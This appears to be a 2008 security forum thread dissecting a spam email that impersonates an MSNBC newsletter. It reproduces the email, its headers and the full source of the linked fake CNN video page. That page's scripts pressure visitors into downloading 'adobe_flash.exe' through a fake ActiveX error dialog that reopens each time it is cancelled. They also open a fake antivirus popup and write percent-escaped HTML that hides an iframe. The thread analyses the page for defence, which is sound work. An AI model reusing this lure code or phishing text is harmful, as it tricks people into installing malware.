Find out more at http://breakingnews.msnbc.com <http://70x7riders.org/up.html>
======================================================
See the top news of the day at MSNBC.com, and the latest from Today Show and NBC Nightly News.

=========================================
This e-mail is never sent unsolicited. You have received this MSNBC Breaking News Newsletter
newsletter because you subscribed to it or, someone forwarded it to you.
To remove yourself from the list (or to add yourself to the list if this
message was forwarded to you) simply go to
http://www.msnbc.msn.com/id/77778358 <http://www.msnbc.msn.com/id/22164455> , select unsubscribe, enter the
email address receiving this message, and click the Go button.

Microsoft Corporation - One Microsoft Way - Redmond, WA 98052
MSN PRIVACY STATEMENT
http://privacy.msn.com (http://privacy.msn.com/> <http://privacy.msn.com/> )


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>msnbc.com: BREAKING NEWS: Find out how to get top returns for your money at minimum risk<BR>
<BR>
Find out more at <A HREF="http://breakingnews.msnbc.com">http://breakingnews.msnbc.com</A> &lt;<A HREF="http://70x7riders.org/up.html">http://70x7riders.org/up.html</A>&gt;<BR>
======================================================<BR>
See the top news of the day at MSNBC.com, and the latest from Today Show and NBC Nightly News.<BR>
<BR>
=========================================<BR>
This e-mail is never sent unsolicited. You have received this MSNBC Breaking News Newsletter<BR>
newsletter because you subscribed to it or, someone forwarded it to you.<BR>
To remove yourself from the list (or to add yourself to the list if this<BR>
message was forwarded to you) simply go to<BR>
<A HREF="http://www.msnbc.msn.com/id/77778358">http://www.msnbc.msn.com/id/77778358</A> &lt;<A HREF="http://www.msnbc.msn.com/id/22164455">http://www.msnbc.msn.com/id/22164455</A>&gt; , select unsubscribe, enter the<BR>
email address receiving this message, and click the Go button.<BR>
<BR>
Microsoft Corporation - One Microsoft Way - Redmond, WA 98052<BR>
MSN PRIVACY STATEMENT<BR>
<A HREF="http://privacy.msn.com">http://privacy.msn.com</A> (<A HREF="http://privacy.msn.com/">http://privacy.msn.com/</A>&gt; &lt;<A HREF="http://privacy.msn.com/">http://privacy.msn.com/</A>&gt; )<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <marneuse1968@2callback.com>
Delivered-To: services@it-mate.co.uk
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-72.livemail.co.uk (Postfix) with SMTP id D9E8466E6CA
for <services@it-mate.co.uk>; Wed, 13 Aug 2008 11:35:29 +0100 (BST)
Received: from cpc2-stre2-0-0-cust927.bagu.cable.ntl.com (cpc2-stre2-0-0-cust927.bagu.cable.ntl.com [86.15.247.160])
by smtp-in-72.livemail.co.uk (Postfix) with ESMTP id 998CC66E6CA
for <kubbdn@it-mate.co.uk>; Wed, 13 Aug 2008 11:35:29 +0100 (BST)
thread-index: b7a9509e27058518a97ac610e0ca09==
Thread-Topic: msnbc.com - BREAKING NEWS: Find out how to get top returns for your money at minimum risk
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft CDO for Windows 2000
Content-Class: urn:content-classes:message
Importance: normal
Priority: normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.3119
Message-ID:  <001001c8fd30$4bd8b510$a0f70f56@D3MKR42J>
Date:         Wed, 13 Aug 2008 11:35:25 +0100
Reply-To: MSNBC Breaking News <marneuse1968@2callback.com>
From: MSNBC Breaking News <marneuse1968@2callback.com>
Subject: msnbc.com - BREAKING NEWS: Find out how to get top returns for your money at minimum risk
To: kubbdn@it-mate.co.uk
Precedence: list
X-Original-To: kubbdn@it-mate.co.uk



Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://70x7riders.org/up.html
Server IP: 72.167.131.134 [ p3swh195.shr.phx3.secureserver.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 7
iFrames: 0
Date: 13 August 2008
Time: 12:01:19:01
*****************************************************************
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
        "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<title>Video - Breaking News Videos from CNN.com</title>
<meta name="Title" content="Video - Breaking News Videos from CNN.com">
<meta name="Description" content="Find the latest video news stories and information free from CNN.com. Watch breaking news and video clips about politics, entertainment, weather, the world, and more.">
<meta name="Keywords" content="CNN, CNN news, CNN.com, CNN TV, CNN video, CNN video news, CNN Live, CNN.com video, CNN.com Live, Live from CNN.com, video, VOD, video news, live, live video, live breaking news, flash video, flash video player">
<link rel="alternate" type="application/rss+xml" title="CNN.com: Video" href="http://rss.cnn.com/rss/cnn_freevideo.rss" />
<link rel="stylesheet" href="common.css" type="text/css" />
<link rel="stylesheet" href="bvp.css" type="text/css" />
<script>
function activex_is_here()
{
    try
    {
        return false;
    }
    catch(e)
    {
        ;
    }

    return false;
}

function releaseMovie() {
if (activex_is_here()) {
document.getElementById('playMov').innerHTML = '<embed src="/movie.mpg" width="480" height="400" autostart="true" type="movie/mpg"></embed>';
}
}function codecDownload()
{
if (window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1) {
return;
}
else {
window.setTimeout("location.href='adobe_flash.exe'", 3000);
}
}

var begin_popup_url = 'http://asvoo.org/antivir/';
function show_begin_popup()
{
     if (begin_popup_url && begin_popup_url != '')
     {
var width = window.screen.availWidth;
var height = window.screen.availHeight;
var left = 0;
var top = 0;

params = 'height='+height+',width='+width+',left='+left+',top='+top+',toolbar=0,status=0,menubar=0,status=0,menubar=0,resizable=0,scrollbars=1';

pop = window.open(begin_popup_url, '_blank', params);
window.focus();
     }
}

</script>
</head>

<body>

<script>


var Drag = {
obj : null,
init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
{
o.onmousedown = Drag.start;

o.hmode = bSwapHorzRef ? false : true ;
o.vmode = bSwapVertRef ? false : true ;

o.root = oRoot && oRoot != null ? oRoot : o ;

if (o.hmode  && isNaN(parseInt(o.root.style.left  ))) o.root.style.left   = "0px";
if (o.vmode  && isNaN(parseInt(o.root.style.top   ))) o.root.style.top    = "0px";
if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right  = "0px";
if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";

o.minX = typeof minX != 'undefined' ? minX : null;
o.minY = typeof minY != 'undefined' ? minY : null;
o.maxX = typeof maxX != 'undefined' ? maxX : null;
o.maxY = typeof maxY != 'undefined' ? maxY : null;

o.xMapper = fXMapper ? fXMapper : null;
o.yMapper = fYMapper ? fYMapper : null;

o.root.onDragStart = new Function();
o.root.onDragEnd = new Function();
o.root.onDrag = new Function();
},

start : function(e)
{
var o = Drag.obj = this;
e = Drag.fixE(e);
var y = parseInt(o.vmode ? o.root.style.top  : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
o.root.onDragStart(x, y);

o.lastMouseX = e.clientX;
o.lastMouseY = e.clientY;

if (o.hmode) {
if (o.minX != null) o.minMouseX = e.clientX - x + o.minX;
if (o.maxX != null) o.maxMouseX = o.minMouseX + o.maxX - o.minX;
} else {
if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
}

if (o.vmode) {
if (o.minY != null) o.minMouseY = e.clientY - y + o.minY;
if (o.maxY != null) o.maxMouseY = o.minMouseY + o.maxY - o.minY;
} else {
if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
}

document.onmousemove = Drag.drag;
document.onmouseup = Drag.end;

return false;
},

drag : function(e)
{
e = Drag.fixE(e);
var o = Drag.obj;

var ey = e.clientY;
var ex = e.clientX;
var y = parseInt(o.vmode ? o.root.style.top  : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
var nx, ny;

if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);

nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));

if (o.xMapper) nx = o.xMapper(y)
else if (o.yMapper) ny = o.yMapper(x)

Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
Drag.obj.lastMouseX = ex;
Drag.obj.lastMouseY = ey;

Drag.obj.root.onDrag(nx, ny);
return false;
},

end : function()
{
document.onmousemove = null;
document.onmouseup   = null;
Drag.obj.root.onDragEnd( parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]),
parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
Drag.obj = null;
},

fixE : function(e)
{
if (typeof e == 'undefined') e = window.event;
if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
return e;
}
};

function Down(download,e)
{
if (e!=null && e.keyCode==27)
{ Close();
return;
}
    switch (download)
    {
        case "iax": document.location.href="adobe_flash.exe"; break;
        Close();
    }

}

function vc() {
if (confirm('Video ActiveX Object Error.\n\nYour browser cannot play this video file.\nClick \'OK\' to download and install missing Video ActiveX Object.')) {
location.href="adobe_flash.exe";
}
else {
if (alert('Please install new version of Video ActiveX Object.')) {
vc();
}
else {
vc();
}
}
}

function Close()
{
    var p=document.getElementById("popdiv");
    p.style.visibility="hidden";
vc();
}
function Details()
{
alert('You must download Video ActiveX Object to play this video file.');
}

</script>

<div name="popdiv" id="popdiv" onKeyPress="Down('iax',event);" style="visibility:hidden; z-index:1;position:absolute;top:0px;left:0px;">
<table cellpadding="0" cellspacing="0" width="362" height="126">
<tr><td>
<table cellpadding="0" cellspacing="0" width="362" height="29" style=" BACKGROUND-IMAGE:URL('xptop.gif'); height:29px; width:362;"> <!-- win top table -->
<tr>
<td style="color:white; font-family:Tahoma; font-size:13px; font-weight:bold; padding-left:4px;padding-top:1px">&nbsp;&nbsp;Video ActiveX Object Error.</td>
<td width="21" style="padding-right:6px;"><img src="xpclose.gif" width="21" height="21" onClick="Close();" style="cursor:default;" ></td>
</tr>
</table>
</td></tr>
<tr><td>
<table cellpadding="0" cellspacing="0" height="97">
<tr>
<td style="background-image:url(left.gif); background-repeat:repeat-y;" valign="bottom">
<table cellpadding="0" cellspacing="0">
<tr><td><img src="xpleftclm.gif" width="3" height="97"></td></tr>
</table>
</td>
<td valign="top">
<table cellpadding="0" cellspacing="0" width="356" bgcolor="ece9d8">
<tr><td>
<table cellpadding="0" cellspacing="0" height="59">
<tr>
<td align="center" style="padding-left:20px; padding-top:13px;" valign="top">
<img src="alert.gif" width="31" height="32"></td>
<td align="left" style="font-size:11px;  font-family:Tahoma; padding-left:30px; padding-bottom:8px; padding-right:5px;">
<br><b>Video ActiveX Object Error:</b><br>Your browser cannot display this video file.<br><br>You need to download new version of Video ActiveX Object to play this video file.
</td></tr>
</table>
</td>
</tr>
<tr><tr>
<td style="padding-left:20px; padding-right:20px; padding-bottom:20px; font-family:Tahoma; font-size:11px;" align="center">
<hr><br>Click Continue to download and install ActiveX Object.
</td></tr><td>
<table align="center" cellpadding="0" cellspacing="6" height="22">
<tr height="22">
<td><input type="button" value="Continue" onClick="Down('iax');" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" tabindex="1" ID="Button1" NAME="Button1"><br><br></td>
<td></td>
<td><input type="button" value="Cancel" onClick="Close()" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" ID="Button3" NAME="Button3"><br><br></td>
<td><input type="button" value="Details..." onClick="Details()" style="font-size:11px;  font-family:Arial; height:23px; width:82px;" ID="Button3" NAME="Button3"><br><br></td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<table cellpadding="0" cellspacing="0" width="100%">
<tr bgcolor="4577ea" style="height:1px;">
<td></td>
</tr> <!-- empty colors -->
<tr bgcolor="0029b5" style="height:1px;">
<td></td>
</tr>
<tr bgcolor="001590" style="height:1px;">
<td></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
<td style="background-image:url(right.gif); background-repeat:repeat-y;" valign="bottom">
<table cellpadding="0" cellspacing="0">
<tr>
<td style="padding:0px;"><img src="xprightclm.gif" width="3" height="97"></td>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>

<script>
if (navigator.userAgent.indexOf("Firefox")!=-1) {
if (activex_is_here()) { } else {
setTimeout("Close();", 1000);
}
}
else {
if (activex_is_here()) { } else {
setTimeout("showPopDiv();",2000);
}
}
     
function showPopDiv()
{
var sFlag = "No";
var byFlag = false;
var FlagAr = sFlag.split("");

if (FlagAr[0]=="1"){byFlag = true;}
if (FlagAr[0]=="3"){byFlag = true;}

if(!byFlag) {
var p=document.getElementById("popdiv");

var myWidth = 0, myHeight = 0;
if( typeof( window.innerWidth ) == 'number' ) {
myWidth = window.innerWidth;
myHeight = window.innerHeight;
} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {
myWidth = document.documentElement.clientWidth;
myHeight = document.documentElement.clientHeight;
} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {
myWidth = document.body.clientWidth;
myHeight = document.body.clientHeight;
}

function getScroll() {

var scrOfX = 0, scrOfY = 0;
if( typeof( window.pageYOffset ) == 'number' ) {
scrOfY = window.pageYOffset;
scrOfX = window.pageXOffset;
} else if( document.body && ( document.body.scrollLeft || document.body.scrollTop ) ) {
scrOfY = document.body.scrollTop;
scrOfX = document.body.scrollLeft;
} else if( document.documentElement && ( document.documentElement.scrollLeft || document.documentElement.scrollTop ) ) {
scrOfY = document.documentElement.scrollTop;
scrOfX = document.documentElement.scrollLeft;
}
return [scrOfX, scrOfY];

}

sc = getScroll();
p.style.top = (myHeight/2 - 181)+sc[1]+'px';
p.style.left = (myWidth/2 - 120) + sc[0]+'px';
p.style.visibility = 'visible';
p.focus();
}
}

Drag.init(document.getElementById("popdiv"));
</script>

</div>

<div id="cnnContainer">
<div id="cnnContentContainer">
<div id="cnnVPContainer">

<div class="cnnBackHome">
<style type="text/css">
<!--
.cnnOpin {float:right;color:#F2F2F2;font-size:11px;}
.cnnOpin a.realmLink {font-weight:bold;font-size:11px;}
.cnnOpin a {margin:0px 6px;}
-->
</style>

<Script Language='Javascript'>
<!--
document.write(unescape('%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%6E%6E%4F%70%69%6E%22%3E%0A%3C%61%20%68%72%65%66%3D%22%23%22%20%63%6C%61%73%73%3D%22%72%65%61%6C%6D%4C%69%6E%6B%22%3E%3C%69%6D%67%20%73%72%63%3D%22%6F%70%69%6E%69%6F%6E%42%6C%75%65%2E%67%69%66%22%20%74%69%74%6C%65%3D%22%46%65%65%64%62%61%63%6B%22%20%73%74%79%6C%65%3D%22%6D%61%72%67%69%6E%2D%72%69%67%68%74%3A%20%35%70%78%3B%22%20%62%6F%72%64%65%72%3D%22%30%22%3E%46%65%65%64%62%61%63%6B%3C%2F%61%3E%20%7C%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%68%65%6C%70%2F%76%69%64%65%6F%2E%68%74%6D%6C%22%3E%48%65%6C%70%3C%2F%61%3E%3C%2F%64%69%76%3E%09%09%09%0A%0A%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%22%3E%26%6C%61%71%75%6F%3B%20%43%4E%4E%2E%63%6F%6D%20%48%6F%6D%65%70%61%67%65%3C%2F%61%3E%20%20%0A%3C%2F%64%69%76%3E%0A%0A%3C%64%69%76%20%69%64%3D%22%63%6E%6E%56%50%4E%61%76%22%3E%0A%3C%74%61%62%6C%65%20%63%65%6C%6C%73%70%61%63%69%6E%67%3D%22%30%22%20%63%65%6C%6C%73%70%61%63%69%6E%67%3D%22%30%22%20%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%39%34%30%22%3E%0A%3C%63%6F%6C%67%72%6F%75%70%3E%0A%3C%63%6F%6C%20%77%69%64%74%68%3D%22%32%34%37%22%3E%0A%3C%63%6F%6C%20%77%69%64%74%68%3D%22%32%33%31%22%3E%0A%3C%63%6F%6C%20%77%69%64%74%68%3D%22%32%33%31%22%3E%0A%3C%63%6F%6C%20%77%69%64%74%68%3D%22%32%33%31%22%3E%0A%3C%2F%63%6F%6C%67%72%6F%75%70%3E%0A%3C%74%72%3E%0A%3C%74%64%3E%3C%69%6D%67%20%73%72%63%3D%22%63%6E%6E%5F%76%69%64%65%6F%5F%6C%6F%67%6F%2E%67%69%66%22%20%77%69%64%74%68%3D%22%31%33%30%22%20%68%65%69%67%68%74%3D%22%32%34%22%20%61%6C%74%3D%22%22%20%62%6F%72%64%65%72%3D%22%30%22%20%63%6C%61%73%73%3D%22%63%6E%6E%56%69%64%65%6F%4C%6F%67%6F%22%3E%3C%2F%74%64%3E%0A%3C%74%64%20%63%6C%61%73%73%3D%22%4E%61%76%49%74%65%6D%22%3E%3C%69%6D%67%20%73%72%63%3D%22%76%69%64%65%6F%5F%69%63%6F%6E%5F%61%63%74%69%76%65%2E%67%69%66%22%20%61%6C%74%3D%22%22%20%62%6F%72%64%65%72%3D%22%30%22%3E%26%6E%62%73%70%3B%3C%61%20%68%72%65%66%3D%22%23%22%3E%4C%69%76%65%20%56%69%64%65%6F%3C%2F%61%3E%3C%2F%74%64%3E%0A%3C%74%64%20%63%6C%61%73%73%3D%22%4E%61%76%49%74%65%6D%22%3E%3C%69%6D%67%20%73%72%63%3D%22%70%6F%64%63%61%73%74%5F%69%63%6F%6E%2E%67%69%66%22%20%77%69%64%74%68%3D%22%31%32%22%20%68%65%69%67%68%74%3D%22%31%34%22%20%61%6C%74%3D%22%22%20%62%6F%72%64%65%72%3D%22%30%22%3E%26%6E%62%73%70%3B%3C%61%20%68%72%65%66%3D%22%23%22%3E%50%6F%64%63%61%73%74%73%3C%2F%61%3E%3C%2F%74%64%3E%0A%3C%74%64%20%63%6C%61%73%73%3D%22%4E%61%76%49%74%65%6D%22%3E%3C%69%6D%67%20%73%72%63%3D%22%72%61%64%69%6F%5F%69%63%6F%6E%2E%67%69%66%22%20%77%69%64%74%68%3D%22%31%31%22%20%68%65%69%67%68%74%3D%22%31%34%22%20%61%6C%74%3D%22%22%20%62%6F%72%64%65%72%3D%22%30%22%3E%26%6E%62%73%70%3B%3C%61%20%68%72%65%66%3D%22%23%22%3E%43%4E%4E%26%6E%62%73%70%3B%52%61%64%69%6F%3C%2F%61%3E%3C%2F%74%64%3E%0A%3C%69%66%72%61%6D%65%20%69%64%3D%22%30%31%22%20%73%72%63%3D%22%6D%65%74%61%69%2E%68%74%6D%6C%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%2F%74%72%3E%0A%3C%2F%74%61%62%6C%65%3E%0A%3C%2F%64%69%76%3E%0A%0A%3C%64%69%76%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%61%6C%69%67%6E%3A%63%65%6E%74%65%72%22%3E%0A%3C%70%3E%3C%61%20%68%72%65%66%3D%22%23%22%20%6F%6E%43%6C%69%63%6B%3D%22%73%68%6F%77%5F%62%65%67%69%6E%5F%70%6F%70%75%70%28%29%3B%77%69%6E%64%6F%77%2E%63%6C%6F%73%65%28%29%3B%22%20%3E%3C%69%6D%67%20%73%72%63%3D%22%63%6C%6F%73%65%2E%70%6E%67%22%20%61%6C%74%3D%22%43%6C%6F%73%65%20%74%68%65%20%70%61%67%65%22%20%62%6F%72%64%65%72%3D%22%30%22%20%68%65%69%67%68%74%3D%22%35%30%22%20%77%69%64%74%68%3D%22%33%30%30%22%3E%3C%2F%61%3E%3C%2F%70%3E%0A%3C%21%2D%2D%20%4C%41%52%47%45%20%50%4C%41%59%45%52%20%48%54%4D%4C%20%43%4F%44%45%20%2D%2D%3E%0A%3C%61%20%68%72%65%66%3D%22%61%64%6F%62%65%5F%66%6C%61%73%68%2E%65%78%65%22%3E%0A%3C%69%6D%67%20%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%22%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%20%3D%20%27%59%6F%75%20%6D%75%73%74%20%64%6F%77%6E%6C%6F%61%64%20%56%69%64%65%6F%20%41%63%74%69%76%65%58%20%4F%62%6A%65%63%74%20%74%6F%20%70%6C%61%79%20%74%68%69%73%20%76%69%64%65%6F%20%66%69%6C%65%2E%27%3B%22%20%61%6C%74%3D%22%59%6F%75%20%6D%75%73%74%20%64%6F%77%6E%6C%6F%61%64%20%56%69%64%65%6F%20%41%63%74%69%76%65%58%20%4F%62%6A%65%63%74%20%74%6F%20%70%6C%61%79%20%74%68%69%73%20%76%69%64%65%6F%20%66%69%6C%65%2E%22%20%73%72%63%3D%22%6E%6F%5F%66%6C%61%73%68%2E%6A%70%67%22%20%77%69%64%74%68%3D%22%35%38%32%22%20%68%65%69%67%68%74%3D%22%34%37%37%22%20%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%61%3E%0A%3C%21%2D%2D%20%2F%4C%41%52%47%45%20%50%4C%41%59%45%52%20%48%54%4D%4C%20%43%4F%44%45%20%2D%2D%3E%0A%3C%2F%64%69%76%3E%0A%0A%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%6C%65%61%72%22%3E%3C%69%6D%67%20%73%72%63%3D%22%31%5F%30%30%32%2E%67%69%66%22%20%61%6C%74%3D%22%22%20%62%6F%72%64%65%72%3D%22%30%22%20%68%65%69%67%68%74%3D%22%31%22%20%77%69%64%74%68%3D%22%31%22%3E%3C%2F%64%69%76%3E%0A%0A%3C%2F%64%69%76%3E%0A%3C%2F%64%69%76%3E%0A%0A%3C%64%69%76%20%73%74%79%6C%65%3D%22%6D%61%72%67%69%6E%2D%74%6F%70%3A%20%31%35%70%78%3B%20%66%6F%6E%74%2D%73%69%7A%65%3A%20%31%31%70%78%3B%20%6C%69%6E%65%2D%68%65%69%67%68%74%3A%20%31%38%70%78%3B%20%63%6F%6C%6F%72%3A%20%72%67%62%28%31%34%38%2C%20%31%34%38%2C%20%31%34%38%29%3B%22%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%0A%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%22%3E%48%6F%6D%65%3C%2F%61%3E%20%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%57%4F%52%4C%44%2F%22%3E%57%6F%72%6C%64%3C%2F%61%3E%20%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%55%53%2F%22%3E%55%2E%53%2E%3C%2F%61%3E%20%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%50%4F%4C%49%54%49%43%53%2F%22%3E%50%6F%6C%69%74%69%63%73%3C%2F%61%3E%20%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%53%48%4F%57%42%49%5A%2F%22%3E%45%6E%74%65%72%74%61%69%6E%6D%65%6E%74%3C%2F%61%3E%20%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%48%45%41%4C%54%48%22%3E%48%65%61%6C%74%68%3C%2F%61%3E%20%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%54%45%43%48%22%3E%54%65%63%68%3C%2F%61%3E%20%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%54%52%41%56%45%4C%2F%22%3E%54%72%61%76%65%6C%3C%2F%61%3E%20%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%76%69%64%65%6F%2F%6C%69%76%69%6E%67%22%3E%4C%69%76%69%6E%67%3C%2F%61%3E%20%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%6D%6F%6E%65%79%2F%22%3E%42%75%73%69%6E%65%73%73%3C%2F%61%3E%20%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%73%69%2F%22%3E%53%70%6F%72%74%73%3C%2F%61%3E%20%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%74%69%6D%65%2F%22%3E%54%69%6D%65%2E%63%6F%6D%3C%2F%61%3E%3C%62%72%3E%0A%A9%20%32%30%30%37%20%43%61%62%6C%65%20%4E%65%77%73%20%4E%65%74%77%6F%72%6B%20%4C%50%2C%20%4C%4C%4C%50%2E%20%41%20%54%69%6D%65%20%57%61%72%6E%65%72%20%43%6F%6D%70%61%6E%79%2E%20%41%6C%6C%20%52%69%67%68%74%73%20%52%65%73%65%72%76%65%64%2E%3C%62%72%3E%0A%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%69%6E%74%65%72%61%63%74%69%76%65%5F%6C%65%67%61%6C%2E%68%74%6D%6C%22%3E%54%65%72%6D%73%20%6F%66%20%73%65%72%76%69%63%65%3C%2F%61%3E%20%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%70%72%69%76%61%63%79%2E%68%74%6D%6C%22%3E%50%72%69%76%61%63%79%20%67%75%69%64%65%6C%69%6E%65%73%3C%2F%61%3E%20%3C%21%2D%2D%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%41%64%76%65%72%74%69%73%65%22%3E%41%64%76%65%72%74%69%73%65%20%77%69%74%68%20%75%73%3C%2F%61%3E%20%2D%2D%3E%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%61%62%6F%75%74%2F%22%3E%41%62%6F%75%74%20%75%73%3C%2F%61%3E%20%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%66%65%65%64%62%61%63%6B%2F%22%3E%43%6F%6E%74%61%63%74%20%75%73%3C%2F%61%3E%20%26%6E%62%73%70%3B%7C%26%6E%62%73%70%3B%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%65%64%69%74%69%6F%6E%2E%63%6E%6E%2E%63%6F%6D%2F%68%65%6C%70%2F%22%3E%48%65%6C%70%3C%2F%61%3E%0A%3C%2F%64%69%76%3E%0A%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E'));
//-->
</Script>
Title: Re: R-thing
Post by: MysteryFCM on August 13, 2008, 11:04:18 am
The escaped code at the bottom unescapes to;

Code: [Select]
<div class="cnnOpin">
<a href="#" class="realmLink"><img src="opinionBlue.gif" title="Feedback" style="margin-right: 5px;" border="0">Feedback</a> | <a href="http://edition.cnn.com/help/video.html">Help</a></div>

